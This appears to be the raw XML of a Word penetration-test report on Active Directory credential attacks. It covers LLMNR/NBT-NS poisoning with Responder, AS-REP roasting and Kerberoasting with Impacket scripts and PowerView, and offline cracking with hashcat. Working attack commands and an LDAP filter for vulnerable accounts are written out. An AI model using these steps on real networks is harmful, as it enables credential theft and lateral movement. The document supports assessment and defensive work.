        <w:t>LLMNR/NBT-NS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Credential</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Poisoning:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="10114" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="69"/>
        <w:ind w:left="715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FF00"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="1E1E1E" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>responder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="00FF00"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="1E1E1E" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="00FF00"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="1E1E1E" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>-I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="00FF00"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="1E1E1E" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="00FF00"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="1E1E1E" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>eth0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="00FF00"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="1E1E1E" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="00FF00"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="1E1E1E" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="00FF00"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="1E1E1E" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>dwv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="00FF00"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="1E1E1E" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:i w:val="0"/>
          <w:sz w:val="4"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:i w:val="0"/>
          <w:sz w:val="4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914400</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>48931</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5985828" cy="720089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828" cy="720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76"/>
        <w:ind w:left="720" w:right="1129" w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Responder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>intercepted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>NTLM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>authentication</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>attempts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>domain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>workstations, capturing NTLMv2 challenge response hashes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="10114" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="102"/>
        <w:ind w:left="715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FF00"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="1E1E1E" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>hashcat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="00FF00"/>
          <w:spacing w:val="-13"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="1E1E1E" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="00FF00"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="1E1E1E" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>-m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="00FF00"/>
          <w:spacing w:val="-11"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="1E1E1E" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="00FF00"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="1E1E1E" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>5600</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="00FF00"/>
          <w:spacing w:val="-11"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="1E1E1E" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="00FF00"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="1E1E1E" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>ntlmv2.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="00FF00"/>
          <w:spacing w:val="-11"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="1E1E1E" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="00FF00"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="1E1E1E" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>/usr/share/wordlists/rockyou.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="00FF00"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="1E1E1E" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="00FF00"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="1E1E1E" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="00FF00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="1E1E1E" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>force</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="00FF00"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="1E1E1E" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:i w:val="0"/>
          <w:sz w:val="3"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:i w:val="0"/>
          <w:sz w:val="3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670559</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>42535</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6724206" cy="422909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206" cy="422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ourier New"/>
          <w:i w:val="0"/>
          <w:sz w:val="3"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1420" w:bottom="280" w:left="720" w:right="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>AS-REP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Roasting:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="278" w:lineRule="auto" w:before="221"/>
        <w:ind w:left="720" w:right="1129" w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>AS-REP Roasting targets user accounts that have Kerberos pre-authentication disabled. Normally, when a client requests authentication, it must first prove knowledge of its password by encrypting a timestamp. When pre-authentication is disabled, the Key Distribution Center (KDC)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>will</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>respond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any</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>authentication</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>request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AS-REP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>message</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>containing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>encrypted data that can be cracked offine-without knowing the user's password first.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="249"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Identification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Vulnerable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Users:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto" w:before="306"/>
        <w:ind w:left="720" w:right="1211" w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Vulnerable accounts were identified by querying AD for users with the DONT_REQ_PREAUTH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>set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their</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>User</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Control</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(UAC)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>attribute.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>These</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>accounts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>are high-value targets because they expose hashes without requiring any prior authentication.</w:t>
      </w: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40" w:lineRule="auto" w:before="162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PowerView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query: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Get-DomainUser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2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>PreauthNotRequired</w:t>
      </w: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40" w:lineRule="auto" w:before="14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LDAP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filter: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(userAccountControl:1.2.840.113556.1.4.803:=4194304)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Extraction:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="278" w:lineRule="auto" w:before="302"/>
        <w:ind w:left="720" w:right="1129" w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Impacted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>toolkit's</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>GetNPUsers.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>script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request</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>AS-REP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>responses</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>from the KDC for all identified vulnerable users. The script performs unauthenticated requests and returns the encrypted portion of the response, which contains data encrypted with the user's password hash.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914400</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>99490</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5940878" cy="554545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78" cy="55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11"/>
        <w:ind w:left="720" w:right="1500" w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Successful</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>cracking</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>revealed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>plaintext</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>credentials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6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7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>identified</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>users,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>enabling further authenticated enumeration and privilege escalation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="158"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Kerberoasting:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="219"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>SPN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t> Enumeration:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="217"/>
        <w:ind w:left="1441"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Service</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>accounts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registered</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>SPNs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>were</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>enumerated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Impact’s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>GetUserSPNs.py.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="278" w:lineRule="auto" w:before="47"/>
        <w:ind w:left="720" w:right="1211"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>SPNs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registered</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3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service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8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account,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any</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>authenticated</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>user can query them via LDAP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:after="0" w:line="278" w:lineRule="auto"/>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1420" w:bottom="280" w:left="720" w:right="360"/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3239" cy="1607820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239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24"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Ticket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Extraction:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="278" w:lineRule="auto" w:before="221"/>
        <w:ind w:left="720" w:right="1129" w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>TGS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>tickets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requested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all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>identified</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>SPN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>accounts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Each</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ticket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encrypted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>with the corresponding service account's NTLM password hash, making them offine crackable artifacts with no interaction with the account required after the initial request.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="158"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Cracking:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="273" w:lineRule="auto" w:before="221" w:after="4"/>
        <w:ind w:left="720" w:right="1129" w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>TGS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>hashes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(Hashcat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>mode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>13100)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>were</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>cracked</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>using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/>
        <w:t>hybrid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>attack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>combining dictionary and rule-based approaches.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="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95068" cy="1114805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5068" cy="11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8" w:lineRule="auto" w:before="258"/>
        <w:ind w:left="720" w:right="1129" w:firstLine="720"/>
        <w:rPr>
          <w:i w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Service</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>accounts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weak</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>default</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>passwords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cracked,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>providing credentials that could be used for lateral movement or further privilege escalation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
